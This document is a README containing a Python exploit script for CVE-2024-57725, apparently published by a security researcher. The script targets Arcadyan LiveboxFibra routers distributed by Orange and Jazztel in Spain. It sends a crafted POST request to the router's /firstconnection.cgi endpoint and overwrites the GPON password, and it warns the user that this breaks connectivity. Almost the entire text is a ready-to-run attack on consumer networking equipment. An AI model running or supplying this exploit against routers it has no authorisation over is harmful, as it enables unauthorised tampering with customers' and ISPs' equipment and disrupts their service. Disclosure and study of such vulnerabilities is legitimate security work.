README.md
Rendering markdown...
#!/usr/bin/python3
#
# Exploit Title: GPON Link Manipulation Vulnerability in Arcadyan Routers (Distributed by Orange and Jazztel)
# Date: 01/14/2025
# Exploit Author: pointedsec
# Vendor Homepage: https://www.arcadyan.com
# Affected ISPs: Orange and Jazztel (Spain)
# Tested on: Arcadyan routers distributed by Orange and Jazztel - LiveboxFibra (PRV3399B_B_LT)
# CVE: CVE-2024-57725
#
import requests
import base64
ROUTER_IP = "192.168.1.1"
CHANGE_ONT_PATH = "/firstconnection.cgi"
GPON_NEW_PASSWORD = "a"
HEX_PADDING = 20
def text_to_padded_hex(text, total_chars):
hex_value = text.encode("utf-8").hex()
padding_needed = total_chars - len(hex_value)
if padding_needed < 0:
raise ValueError("El texto en hexadecimal supera el número de caracteres deseado.")
padded_hex = "0" * padding_needed + hex_value
return padded_hex
def main():
data = "GO=firstconnection.htm&pws=<BASE64_HEX_GPON_PWD>&GO=firstconnection.htm"
headers = {
'Content-Type': 'text/plain;charset=UTF-8'
}
# Convert necessary data
padded_hex = text_to_padded_hex(GPON_NEW_PASSWORD, HEX_PADDING)
base64_value = base64.b64encode(padded_hex.encode("utf-8")).decode("utf-8")
print("[i] Padded hex: %s ; base64 value: %s" % (padded_hex, base64_value))
# Extra confirmation
confirm = input("[i] This will change your liveboxfibra GPON password and will cause connectivity issues, make sure you've got the original GPON password, want to proceed? (yes or no): ")
if confirm == "no":
print("[i] Exiting...")
exit(0)
# Change GPON Password
payload = data.replace("<BASE64_HEX_GPON_PWD>", base64_value)
r = requests.post("http://" + ROUTER_IP + CHANGE_ONT_PATH, headers=headers, data=payload)
if r.status_code == 200:
print("[i] GPON Password Changed! Wait a few seconds and check the new password with check_ont_value.py")
if __name__ == "__main__":
confirm = input("[i] Are you sure? This would cause connectivity issues, first backup the GPON password (yes or no): ")
if confirm == "yes":
main()
else:
print("[i] Exiting...")
exit(0)